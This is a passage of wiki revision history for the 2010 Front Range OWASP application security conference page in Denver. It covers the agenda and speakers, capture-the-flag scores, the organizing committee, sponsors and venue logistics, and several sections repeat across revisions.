| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
<br />
[http://video.google.com/videoplay?docid=-4972597638535731442 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
<br />
[http://video.google.com/videoplay?docid=8588268474844052248 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
--><br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
====Capture the Flag (CTF)====<br />
<br />
A capture the flag contest was held, with challenges in the categories of network, forensics, and web applications. The winner received a new iPad. Second and third place received an iPod shuffle.<br />
<br />
The team that won the contest consisted of four members of the Denver Defcon group, dc303 (http://dc303.org). This group also plays in the annual Defcon CTF competition (with about 20 other folks from the Denver area). If you are interested in joining them for future CTF competitions (local and abroad), contact mantis1 at gmail.com.<br />
<br />
Second place went to Mattew Rowley (playing on his own)<br />
<br />
Final scores:<br />
{| border="3"<br />
|Rank||Name||Score||Comments<br />
|-<br />
|'''1'''||'''mantis'''||'''4500'''||<br />
|-<br />
|'''2'''||'''Mathew Rowley'''||'''2850'''||'''(wuntee)'''<br />
|-<br />
|'''3'''||'''jgimer'''||'''2300'''||<br />
|-<br />
|4||jsouza||2200||<br />
|-<br />
|5||CSURams||1800||<br />
|-<br />
|6||quincymagoo||1200||<br />
|-<br />
|7||skehoe||700||<br />
|-<br />
|8||jtevans||700||<br />
|-<br />
|9||igctf||700||<br />
|-<br />
|10||kdavis||700||<br />
|}<br />
<br />
<br />
====Conference Committee====<br />
<br />
FROC 2010 Planning Committee Chair: Kathy Thaxton - kthaxton at owasp dot org<br />
<br />
Presentation Selection Committee:<br />
* Mark Bristow - OWASP Global Conference Committee<br />
* David Campbell - OWASP Denver<br />
* Eric Duprey - OWASP Denver<br />
* Chris Hoff - Cloud Security Alliance<br />
* Eoin Keary - Chair, OWASP Global Conference Committee<br />
* Michael Sutton - Cloud Security Alliance<br />
* Jim Reavis - Cloud Security Alliance<br />
<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell at owasp dot org<br />
* Eric Duprey - OWASP Denver - eduprey at owasp dot org<br />
<br />
<br />
Vendor Exhibition POC: Kathy Thaxton - kthaxton at owasp dot org<br />
<br />
<br />
Capture the Flag POC: Eric Duprey - eduprey at owasp dot org<br />
<br />
<br />
====Conference Sponsors====<br />
<br />
[[File:Sponsors.PNG]]<br />
<br />
The following organizations are proud sponsors of this conference:<br />
<!-- <br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
*Fishnet Security<br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
*Trustwave<br />
*WhiteHat Security --><br />
<br />
*[http://www.accuvant.com/ Accuvant]<br />
*[http://www.denimgroup.com/ Denim Group]<br />
*[http://www.fortify.com/ Fortify Software]<br />
*[http://www.hosting.com/ Hosting.com]<br />
*[http://www.whitehatsec.com/home/index.html Whitehat Security]<br />
<br />
<br />
If you are interested in sponsoring next year's Front Range OWASP Conference, please contact Kathy Thaxton at kthaxton at owasp dot org.<br />
<br />
Logistics information for sponsors is available [[FROC2010 Sponsor Info|here]]<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]<br />
<br />
<br />
====Twitter Feed====<br />
{|<br />
|-<br />
| style="border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);" | <br />
Use the '''[http://search.twitter.com/search?q=%23FROC #FROC]''' hashtag for your tweets (What are [http://hashtags.org/ hashtags]?) <br />
<br />
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''<br />
<twitter>55021150</twitter> <br />
<br />
| style="width: 110px; font-size: 95%; color: rgb(0, 0, 0);" | <br />
|} <br />
<br />
<br />
<!-- <hr><br />
<paypal>Denver</paypal> --><br />
<br />
<headertabs /></div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&diff=84412Front Range OWASP Conference 20102010-06-03T21:39:15Z<p>Eduprey: </p>
<hr />
<div>__NOTOC__ <br />
<br />
<!-- [http://froc2010.eventbrite.com/ Registration is NOW OPEN] --><br />
FROC2010 was a major success! If you attended the event, please complete the [http://www.surveymonkey.com/s/FROC2010 Speaker Evaluation Survey]<br />
<br />
<br />
<br> <!-- Header --><br />
====Welcome==== <br />
[[Image:Froc2010_sm.png|200px]]<br />
'''Welcome to FROC 2010, the third annual Front Range OWASP Application Security Conference!'''<br />
<br />
After successful FROC's in June of 2008, and [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 March of 2009], we are back in Denver, Colorado USA on Wednesday the 2nd of June 2010! <br />
<br />
This year we again present a full day, multi-track event, which will provide valuable information for managers and executives as well as developers and engineers.<br />
<br />
In 2009, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2010. This year we are organizing the conference with the support of our colleagues at the [http://www.cloudsecurityalliance.org/ Cloud Security Alliance], and will feature an AppSec track as well as a CloudSec/VirtSec track.<br />
<br />
====Registration====<br />
<br />
<!-- [http://froc2010.eventbrite.com Registration is now open!] --><br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, FROC was a free event in 2008 and 2009. This year, thanks to the generosity of our [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2010#tab=Conference_Sponsors sponsors] we are offering tickets to the event on a DONATION basis. Pay whatever you or your company can afford.<br />
<br />
<!-- Click [http://froc2010.eventbrite.com HERE] to register now. --><br />
<br />
====Agenda====<br />
<br />
==Agenda and Presentations: 2 June 2010==<br />
<br />
The agenda follows the successful OWASP conference multi track format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="4" align="center" style="background:#4058A0; color:white" | June 2, 2010<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Welcome to FROC 2010 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:35 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[FROC2010_Abstract_Chess|"Watching Software Run: Software Security Beyond Defect Elimination"]]<br />
''Brian Chess, Fortify Software''<br />
<br />
[https://docs.google.com/a/owasp.org/leaf?id=0B_-vbfka88vFNjMxYTcwY2ItNjgxNy00ZjMzLTkwMTUtN2IyMzA4MmE3OWVl&sort=name&layout=list&num=50 Presentation] [http://blip.tv/file/3710067 Video]<br />
<br />
<!-- [http://video.google.com/videoplay?docid=2875886330538461390 Video] --><br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:35-10:00 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | OWASP: State of the Union<br />
''Tom Brennan, OWASP Board - [http://www.owasp.org/index.php/User:Brennan BIO]''<br />
<br />
[http://blip.tv/file/3710155 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:00-10:20 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Cloud Security Alliance: State of the Union<br />
''Randy Barr, Cloud Security Alliance''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:20-10:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:22%; background:#BC857A" | '''AppSec/Technical Track: Room 1'''<br />
| style="width:22%; background:#BCA57A" | '''Cloud/Mobile/Emerging Track: Room 2'''<br />
| style="width:22%; background:#C6E2FF" | '''Management / Exec Track: Room 3'''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Grossman|2010: Web Hacking Odyssey - The Top Hacks of the Year]]"<br />
''Jeremiah Grossman''<br />
<br />
[https://docs.google.com/fileview?id=0B_-vbfka88vFZTIwOWY3NjctZTY1OC00YTRjLThjNGUtMDIwZTk3MmVhN2Zi&hl=en Presentation] Video<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_McClellan|"Building a Secure, Compliant Cloud for the Enterprise"]]<br />
''Matt Ferrari, Hosting.com''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Byrne|"Anatomy of a Logic Flaw"]]<br />
''David Byrne and Charles Henderson, Trustwave''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Zusman|Advanced MITM Techniques for Security Testers]]"<br />
''Mike Zusman, Raj Umadas and Aaron Rhodes, Intrepidus Group''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Nickerson|"YOU are the weakest link"]]<br />
''Chris Nickerson, Lares Consulting''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Whaley|"Effectively marketing security as a win for both the business and the customer"]]<br />
''Ben Whaley, Applied Trust Engineering and Jeff Smith, Rally Software''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Wheeler|Vulnerabilities in Secure Code: Now and Beyond]]"<br />
''Alex Wheeler and Ryan Smith, Accuvant''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Roberts|"Real life CSI – Data Mining and Intelligence Gathering for the masses"]]<br />
''Chris Roberts, Cyopsis''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Dickson|"The Permanent Campaign: Driving a Secure Software Initiative in the Enterprise"]]<br />
''John Dickson, Denim Group''<br />
<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:40 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Byrne2|Beware of Serialized GUI Objects Bearing Data]]"<br />
''David Byrne and Rohini Sulatycki, Trustwave''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Zusman2|"What's Old Is New Again: An Overview of Mobile Application Security"]]<br />
''Zach Lanier and Mike Zusman, Intrepidus Group''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Goldschmidt|"Fundamental Practices and Tools to implement a security development lifecycle"]]<br />
''Cassio Goldschmidt, Symantec''<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 14:40-15:00 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | BREAK<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Schmidt|Solving Real-World Problems with an Enterprise Security API]]"<br />
''Chris Schmidt''<br />
<br />
[https://docs.google.com/fileview?id=0B_-vbfka88vFNjM5NzZmODQtZTQ1OS00NTYxLWJmOWQtNzE3OWY4OWZkOGMw&hl=en Presentation] Video<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Tucker|"Cloudy with a chance of hack"]]<br />
''Lars Ewe, Cenzic''<br />
<br />
[https://docs.google.com/present/edit?id=0Af-vbfka88vFZGRrcjYycXZfMjUyZDQ3enN6ZmI&hl=en Presentation]<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Cornell|"Application Security Program Management with Vulnerability Manager"]]<br />
''Bryan Beverly, Denim Group''<br />
<br />
[https://docs.google.com/fileview?id=0B_-vbfka88vFNTY3OGUwMGItMmQyMi00YWRmLWJkMzgtMTZhNDNlZjJiNWJm&hl=en Presentation]<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Panel Discussion: Topic TBD. Moderator: John Dickson, Denim Group<br />
|-<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Wrap up, vendor raffles, CTF awards, FREE BEER!<br />
|-<br />
<br />
|}<br />
<br />
<br />
====Logistics====<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will again be held at University of Colorado, Denver. However, instead of the Tivoli Student Union, this year the event will be hosted at the North Classroom building (Atrium UCD).<br />
<br />
[[File:Froc map.GIF|thumb|left]]<br />
<br />
[http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=1200+Larimer+Street,+Denver,+CO&sll=37.0625,-95.677068&sspn=37.188995,62.226563&ie=UTF8&hq=&hnear=1200+Larimer+St,+Denver,+Colorado+80204&z=16&iwloc=A Google Map of the Venue: 1200 Larimer St., Denver CO 80204]<br />
<br />
=====Accomodation=====<br />
OWASP has negotiated discounted rates with the uber-pimpin [http://www.hotelteatro.com/ Hotel Teatro]. Rooms under the FROC rate are $159/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention FROC or use the [https://reservations.ihotelier.com/crs/g_reservation.cfm?groupID=464765&hotelID=14708 iHotelier.com link here].<br />
<br />
=====How to get to the venue?=====<br />
<br />
*By taxi: taxi from the airport to venue is about $50 USD<br />
<br />
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free<br />
<br />
*By car: there is plenty of parking at the UCD. Attendees should park at the Tivoli lot (as in past years) and it is a short walk to the North Classroom buildings. Parking validation will be provided for registered FROC participants.<br />
<br />
<br />
<!-- <br />
====Call for Presentations====<br />
The [[Front_Range_OWASP_Conference_2010_CFP|call for presentations]] closed 31 March 2010. We are no longer accepting proposals for presentations. If you have already submitted a presentation you can, however update your abstract or submit additional information to clarify your proposal. --><br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<!-- <br />
====Agenda and Presentations: 5 March 2009====<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"Top Ten Web Hacking Techniques of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
<br />
[http://video.google.com/videoplay?docid=2875886330538461390 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
<br />
[http://video.google.com/videoplay?docid=-8396241750899139680 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Stads|"Adobe Flex, AMF 3 and BlazeDS: An Assessment"]] <br />
''Kevin Stadmeyer, Trustwave''<br />
<br />
[http://video.google.com/videoplay?docid=1629208419122953007 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
<br />
[http://video.google.com/videoplay?docid=-2540122072368010669 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
<br />
[http://video.google.com/videoplay?docid=3127205451740977427 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: You can't filter The Stupid"]]<br />
''David Byrne & Charles Henderson, Trustwave''<br />
<br />
[http://video.google.com/videoplay?docid=7611144342490803641 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
<br />
[http://video.google.com/videoplay?docid=129190988572738701 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
<br />
[http://video.google.com/videoplay?docid=-4972597638535731442 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
<br />
[http://video.google.com/videoplay?docid=8588268474844052248 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
--><br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
====Capture the Flag (CTF)====<br />
<br />
A capture the flag contest was held, with challenges in the categories of network, forensics, and web applications. The winner received a new iPad. Second and third place received an iPod shuffle.<br />
<br />
<br />
Final scores:<br />
{| border="3"<br />
|Rank||Name||Score||Comments<br />
|-<br />
|'''1'''||'''mantis'''||'''4500'''||<br />
|-<br />
|'''2'''||'''Mathew Rowley'''||'''2850'''||'''(wuntee)'''<br />
|-<br />
|'''3'''||'''jgimer'''||'''2300'''||<br />
|-<br />
|4||jsouza||2200||<br />
|-<br />
|5||CSURams||1800||<br />
|-<br />
|6||quincymagoo||1200||<br />
|-<br />
|7||skehoe||700||<br />
|-<br />
|8||jtevans||700||<br />
|-<br />
|9||igctf||700||<br />
|-<br />
|10||kdavis||700||<br />
|}<br />
<br />
<br />
====Conference Committee====<br />
<br />
FROC 2010 Planning Committee Chair: Kathy Thaxton - kthaxton at owasp dot org<br />
<br />
Presentation Selection Committee:<br />
* Mark Bristow - OWASP Global Conference Committee<br />
* David Campbell - OWASP Denver<br />
* Eric Duprey - OWASP Denver<br />
* Chris Hoff - Cloud Security Alliance<br />
* Eoin Keary - Chair, OWASP Global Conference Committee<br />
* Michael Sutton - Cloud Security Alliance<br />
* Jim Reavis - Cloud Security Alliance<br />
<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell at owasp dot org<br />
* Eric Duprey - OWASP Denver - eduprey at owasp dot org<br />
<br />
<br />
Vendor Exhibition POC: Kathy Thaxton - kthaxton at owasp dot org<br />
<br />
<br />
Capture the Flag POC: Eric Duprey - eduprey at owasp dot org<br />
<br />
<br />
====Conference Sponsors====<br />
<br />
[[File:Sponsors.PNG]]<br />
<br />
The following organizations are proud sponsors of this conference:<br />
<!-- <br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
*Fishnet Security<br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
*Trustwave<br />
*WhiteHat Security --><br />
<br />
*[http://www.accuvant.com/ Accuvant]<br />
*[http://www.denimgroup.com/ Denim Group]<br />
*[http://www.fortify.com/ Fortify Software]<br />
*[http://www.hosting.com/ Hosting.com]<br />
*[http://www.whitehatsec.com/home/index.html Whitehat Security]<br />
<br />
<br />
If you are interested in sponsoring next year's Front Range OWASP Conference, please contact Kathy Thaxton at kthaxton at owasp dot org.<br />
<br />
Logistics information for sponsors is available [[FROC2010 Sponsor Info|here]]<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]<br />
<br />
<br />
====Twitter Feed====<br />
{|<br />
|-<br />
| style="border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);" | <br />
Use the '''[http://search.twitter.com/search?q=%23FROC #FROC]''' hashtag for your tweets (What are [http://hashtags.org/ hashtags]?) <br />
<br />
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''<br />
<twitter>55021150</twitter> <br />
<br />
| style="width: 110px; font-size: 95%; color: rgb(0, 0, 0);" | <br />
|} <br />
<br />
<br />
<!-- <hr><br />
<paypal>Denver</paypal> --><br />
<br />
<headertabs /></div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&diff=84410Front Range OWASP Conference 20102010-06-03T21:35:13Z<p>Eduprey: Added scores</p>
<hr />
<div>__NOTOC__ <br />
<br />
<!-- [http://froc2010.eventbrite.com/ Registration is NOW OPEN] --><br />
FROC2010 was a major success! If you attended the event, please complete the [http://www.surveymonkey.com/s/FROC2010 Speaker Evaluation Survey]<br />
<br />
<br />
<br> <!-- Header --><br />
====Welcome==== <br />
[[Image:Froc2010_sm.png|200px]]<br />
'''Welcome to FROC 2010, the third annual Front Range OWASP Application Security Conference!'''<br />
<br />
After successful FROC's in June of 2008, and [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 March of 2009], we are back in Denver, Colorado USA on Wednesday the 2nd of June 2010! <br />
<br />
This year we again present a full day, multi-track event, which will provide valuable information for managers and executives as well as developers and engineers.<br />
<br />
In 2009, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2010. This year we are organizing the conference with the support of our colleagues at the [http://www.cloudsecurityalliance.org/ Cloud Security Alliance], and will feature an AppSec track as well as a CloudSec/VirtSec track.<br />
<br />
====Registration====<br />
<br />
<!-- [http://froc2010.eventbrite.com Registration is now open!] --><br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, FROC was a free event in 2008 and 2009. This year, thanks to the generosity of our [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2010#tab=Conference_Sponsors sponsors] we are offering tickets to the event on a DONATION basis. Pay whatever you or your company can afford.<br />
<br />
<!-- Click [http://froc2010.eventbrite.com HERE] to register now. --><br />
<br />
====Agenda====<br />
<br />
==Agenda and Presentations: 2 June 2010==<br />
<br />
The agenda follows the successful OWASP conference multi track format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="4" align="center" style="background:#4058A0; color:white" | June 2, 2010<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Welcome to FROC 2010 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:35 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[FROC2010_Abstract_Chess|"Watching Software Run: Software Security Beyond Defect Elimination"]]<br />
''Brian Chess, Fortify Software''<br />
<br />
[https://docs.google.com/a/owasp.org/leaf?id=0B_-vbfka88vFNjMxYTcwY2ItNjgxNy00ZjMzLTkwMTUtN2IyMzA4MmE3OWVl&sort=name&layout=list&num=50 Presentation] [http://blip.tv/file/3710067 Video]<br />
<br />
<!-- [http://video.google.com/videoplay?docid=2875886330538461390 Video] --><br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:35-10:00 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | OWASP: State of the Union<br />
''Tom Brennan, OWASP Board - [http://www.owasp.org/index.php/User:Brennan BIO]''<br />
<br />
[http://blip.tv/file/3710155 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:00-10:20 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Cloud Security Alliance: State of the Union<br />
''Randy Barr, Cloud Security Alliance''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:20-10:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:22%; background:#BC857A" | '''AppSec/Technical Track: Room 1'''<br />
| style="width:22%; background:#BCA57A" | '''Cloud/Mobile/Emerging Track: Room 2'''<br />
| style="width:22%; background:#C6E2FF" | '''Management / Exec Track: Room 3'''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Grossman|2010: Web Hacking Odyssey - The Top Hacks of the Year]]"<br />
''Jeremiah Grossman''<br />
<br />
[https://docs.google.com/fileview?id=0B_-vbfka88vFZTIwOWY3NjctZTY1OC00YTRjLThjNGUtMDIwZTk3MmVhN2Zi&hl=en Presentation] Video<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_McClellan|"Building a Secure, Compliant Cloud for the Enterprise"]]<br />
''Matt Ferrari, Hosting.com''<br />
<br />
